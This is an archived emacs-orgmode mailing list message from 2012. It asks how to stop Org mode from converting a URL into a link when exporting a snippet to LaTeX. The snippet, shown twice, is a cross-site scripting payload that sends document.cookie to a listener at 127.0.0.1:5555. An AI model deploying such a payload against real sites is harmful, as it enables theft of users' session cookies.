emacs-orgmode
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[O] Reg: html tags inside orgmode


From: Bodhi
Subject: [O] Reg: html tags inside orgmode
Date: Wed, 29 Feb 2012 16:44:09 +0800

Hi,
I am trying to write something like this in org, which I wish to publish to LaTeX:

\texttt{<script>document.write(`<img src="" href="http://127.0.0.1:5555?c=">http://127.0.0.1:5555?c=' +
escape(document.cookie) + `   >'); </script>}

But I am ending up with something like this:

\texttt{<script>document.write(`<img src="" href="http://127.0.0.1:5555?c%3D][http://127.0.0.1:5555?c=]">http://127.0.0.1:5555?c%3D][http://127.0.0.1:5555?c=]]' +
escape(document.cookie) + `   >'); </script>}

How should I be able to display the http part without org automatically turning it into a link?

Thanks in advance


--
Warm regards,
Bodhisatta Barman Roy

reply via email to

[Prev in Thread] Current Thread [Next in Thread]